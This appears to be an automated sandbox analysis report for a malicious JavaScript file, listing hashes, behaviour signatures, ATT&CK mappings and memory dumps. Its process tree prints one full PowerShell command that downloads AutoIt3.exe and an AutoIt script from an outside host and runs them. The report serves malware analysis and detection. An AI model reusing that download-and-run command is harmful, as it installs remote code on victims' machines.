5d7605d640f5ede04a0e61024513f386730bfa223f39ac0d4cf2830ea6dc8500

Resubmissions

27-10-2023 17:41

231027-v9hqxsgb3s 10

27-10-2023 17:25

231027-vzpfqahf58 10

27-10-2023 17:25

231027-vy9p9shf56 10

Analysis

max time kernel
361s
max time network
364s
platform
windows7_x64
resource
win7-20231023-en
resource tags

arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
submitted
27-10-2023 17:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

28102023_0125_trumpet.js
Size

134KB
MD5

63fdbf0bf47d957bc9e77b9bbc7cdaf0
SHA1

3f3d8c96f6cf374c22dd6eac5a1c958482bbe829
SHA256

5d7605d640f5ede04a0e61024513f386730bfa223f39ac0d4cf2830ea6dc8500
SHA512

3c5e6568396ccd2fa63b993cab6c925af83b292a1d0f6e0f22c145c65e7723e698efd2613c202177c695e2038a0295855f8d9b7168815630be990430c2e51849
SSDEEP

1536:hZUTSCM9Cfq7u02PmUVdGXjXl4xc5KTPBoMqS7j8frPWgtZPnCUQrNgZnFFQE/08:UT9U7hgaX6eerjqlI2IO6Mzqf40Ml/

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2928	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2928	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1180 wrote to memory of 2928	1180	wscript.exe	28
PID 1180 wrote to memory of 2928	1180	wscript.exe	28
PID 1180 wrote to memory of 2928	1180	wscript.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\28102023_0125_trumpet.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1180
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/temp' -Type Directory -Force;cd 'C:/temp'; Invoke-WebRequest -Uri 'http://profitcentronline.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://profitcentronline.com:2351/msidctseyzi' -OutFile 'dctseyzi.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'dctseyzi.au3'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2928-4-0x000000001B360000-0x000000001B642000-memory.dmp

Filesize
2.9MB

Download
memory/2928-5-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/2928-6-0x000007FEF5600000-0x000007FEF5F9D000-memory.dmp

Filesize
9.6MB

Download
memory/2928-7-0x0000000002610000-0x0000000002690000-memory.dmp

Filesize
512KB

Download
memory/2928-8-0x0000000002610000-0x0000000002690000-memory.dmp

Filesize
512KB

Download
memory/2928-9-0x0000000002610000-0x0000000002690000-memory.dmp

Filesize
512KB

Download
memory/2928-10-0x000007FEF5600000-0x000007FEF5F9D000-memory.dmp

Filesize
9.6MB

Download
memory/2928-11-0x000007FEF5600000-0x000007FEF5F9D000-memory.dmp

Filesize
9.6MB

Download